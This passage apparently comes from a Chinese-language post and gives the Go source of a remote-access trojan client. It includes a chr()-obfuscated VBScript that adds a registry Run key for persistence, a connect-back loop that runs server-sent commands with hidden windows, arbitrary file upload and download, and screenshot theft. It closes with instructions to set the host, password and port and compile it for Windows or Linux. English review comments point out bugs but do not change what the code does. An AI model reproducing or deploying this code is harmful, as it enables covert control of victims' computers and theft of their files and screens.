118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(116)&chr(101)&chr(115)&chr(116)&chr(46)&chr(118)&chr(98)&chr(115)&chr(32)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101))"), 0666)
	if err2 != nil {
		log.Fatal(err) // NOTE(review): should be err2
	}
	c := exec.Command("cmd", "/c", "add.vbs")
	c.Run()
	er := os.Remove("add.vbs")
	if err != nil { // NOTE(review): should test er
		log.Fatal(er)
	}
}
// getScreenshotFilename returns where TakeScreenShot stores the capture:
// %SYSTEMDRIVE%\ProgramData\tmp.png on Windows, the dot-file /tmp/.tmp.png
// everywhere else.
func getScreenshotFilename() string {
	if runtime.GOOS != "windows" {
		return "/tmp/.tmp.png"
	}
	return os.Getenv("systemdrive") + "\\ProgramData\\tmp.png"
}
// 轉(zhuǎn)化字符串
func ConvertToString(src string, srcCode string, tagCode string) string {
srcCoder := mahonia.NewDecoder(srcCode)
srcResult := srcCoder.ConvertString(src)
tagCoder := mahonia.NewDecoder(tagCode)
_, cdata, _ := tagCoder.Translate([]byte(srcResult), true)
result := string(cdata)
return result
}
// TakeScreenShot captures every active display with kbinani/screenshot and
// PNG-encodes the result to getScreenshotFilename().
//
// NOTE(review): every display is written to the same path, so only the last
// one survives; the deferred Close calls run when the function returns, not
// per iteration; and on a capture error the code calls connect(), which
// never returns (see connect), so the screenshot command then hangs inside
// this call with a second connection open.
func TakeScreenShot() {
	n := screenshot.NumActiveDisplays()
	fpath := getScreenshotFilename()
	for i := 0; i < n; i++ {
		bounds := screenshot.GetDisplayBounds(i)
		img, err := screenshot.CaptureRect(bounds)
		if err != nil {
			connect()
		}
		file, _ := os.Create(fpath)
		defer file.Close()
		png.Encode(file, img)
	}
}
// connect dials IP, sends CONNPWD as the first frame (base64, in the clear)
// and then serves commands until the socket dies. It never returns normally:
// every error path calls connect() again — recursively, so a long outage grows
// the stack and there is no back-off — and "exit" terminates the process.
// main() additionally wraps it in a for loop.
//
// Wire format: one base64 string per line. The server encodes with the URL
// alphabet while this side decodes command and name frames with the standard
// alphabet; the two only agree for payloads whose base64 contains no '-' or
// '_', so certain paths and output names will fail to decode — NOTE(review),
// confirm before relying on upload/download of arbitrary names.
//
// Commands: back (password rejected: reconnect), exit, charset <name>, upload
// (next two frames: destination path chosen by the server and written as-is,
// then the file body), download (next frame: path to read and send back),
// screenshot, getos (uname -a / wmic os get name), and anything else is run
// as a process through mCommandTimeOut with the line split on single spaces —
// no shell, so builtins need "cmd /c ..." or "sh -c ..." and quoting is not
// supported.
func connect() {
	conn, err := net.Dial("tcp", IP)
	if err != nil {
		fmt.Println("Connection...")
		// Retry forever; each attempt recurses instead of looping and there is
		// no delay, so an unreachable server means a hot loop.
		for {
			connect()
		}
	}
	errMsg := base64.URLEncoding.EncodeToString([]byte(CONNPWD))
	conn.Write([]byte(string(errMsg) + "\n"))
	fmt.Println("Connection success...")
	for {
		// Wait for a command: one base64 line terminated by '\n'.
		// NOTE(review): a fresh bufio.Reader per iteration may buffer, and
		// then discard, bytes belonging to the next frame.
		message, err := bufio.NewReader(conn).ReadString('\n')
		if err == io.EOF {
			// Server went away: reconnect (recursively).
			conn.Close()
			connect()
		}
		// Decode the command.
		decodedCase, _ := base64.StdEncoding.DecodeString(message)
		command := string(decodedCase)
		cmdParameter := strings.Split(command, " ")
		switch cmdParameter[0] {
		case "back":
			// The server rejected the password.
			conn.Close()
			connect()
		case "exit":
			conn.Close()
			os.Exit(0)
		case "charset":
			if len(cmdParameter) == 2 {
				charset = cmdParameter[1]
			}
		case "upload":
			// Destination path (server-chosen, no restriction on where), then
			// the file body. 777 here is decimal (mode 1411), not 0777.
			uploadOutput, _ := bufio.NewReader(conn).ReadString('\n')
			decodeOutput, _ := base64.StdEncoding.DecodeString(uploadOutput)
			encData, _ := bufio.NewReader(conn).ReadString('\n')
			decData, _ := base64.URLEncoding.DecodeString(encData)
			ioutil.WriteFile(string(decodeOutput), []byte(decData), 777)
		case "download":
			// The command itself carries nothing; the next frame is the path.
			download, _ := bufio.NewReader(conn).ReadString('\n')
			decodeDownload, _ := base64.StdEncoding.DecodeString(download)
			file, err := ioutil.ReadFile(string(decodeDownload))
			if err != nil {
				// File missing or unreadable: report it to the server.
				errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
				conn.Write([]byte(string(errMsg) + "\n"))
				break
			}
			// Announce a file body so the server switches to receive mode.
			srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("download"))
			conn.Write([]byte(string(srvDownloadMsg) + "\n"))
			// Send the file contents.
			encData := base64.URLEncoding.EncodeToString(file)
			conn.Write([]byte(string(encData) + "\n"))
		case "screenshot":
			TakeScreenShot()
			file, err := ioutil.ReadFile(getScreenshotFilename())
			if err != nil {
				// Capture file missing: report it to the server.
				errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
				conn.Write([]byte(string(errMsg) + "\n"))
				break
			}
			// Announce a screenshot body so the server switches to receive mode.
			srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("screenshot"))
			conn.Write([]byte(string(srvDownloadMsg) + "\n"))
			// Send the PNG.
			encData := base64.URLEncoding.EncodeToString(file)
			conn.Write([]byte(string(encData) + "\n"))
		case "getos":
			if runtime.GOOS == "windows" {
				command = "wmic os get name"
			} else {
				command = "uname -a"
			}
			fallthrough
		default:
			cmdArray := strings.Split(command, " ")
			cmdSlice := cmdArray[1:len(cmdArray)]
			out, outerr := mCommandTimeOut(cmdArray[0], cmdSlice...)
			if outerr != nil {
				out = []byte(outerr.Error())
			}
			// Transcode the output to UTF-8 when a different charset was set.
			if charset != "utf-8" {
				out = []byte(ConvertToString(string(out), charset, "utf-8"))
			}
			encoded := base64.StdEncoding.EncodeToString(out)
			conn.Write([]byte(encoded + "\n"))
		}
	}
}
// mCommandTimeOut runs name with arg... under a context that expires after
// Timeout, with the console window hidden, and returns whatever the process
// wrote to stdout and stderr (merged, in arrival order) together with the
// start/exit error, if any. The buffer is returned even on error.
func mCommandTimeOut(name string, arg ...string) ([]byte, error) {
	ctx, cancel := context.WithTimeout(context.Background(), Timeout)
	defer cancel()

	var output bytes.Buffer
	proc := exec.CommandContext(ctx, name, arg...)
	proc.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	proc.Stdout, proc.Stderr = &output, &output

	// Run is Start followed by Wait; either failure surfaces as the error.
	runErr := proc.Run()
	return output.Bytes(), runErr
}
// mCommand launches name with arg... without waiting for it and without
// capturing output, with the console window hidden. A failure to start is
// printed and otherwise ignored.
func mCommand(name string, arg ...string) {
	proc := exec.Command(name, arg...)
	proc.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	if startErr := proc.Start(); startErr != nil {
		fmt.Println(startErr)
	}
}
0x05 關(guān)于使用
修改好,其中的一些連接參數(shù),密碼,端口,編譯成EXE即可,Golang支持跨平臺,也可以編譯成Linux版本,進行遠程控制。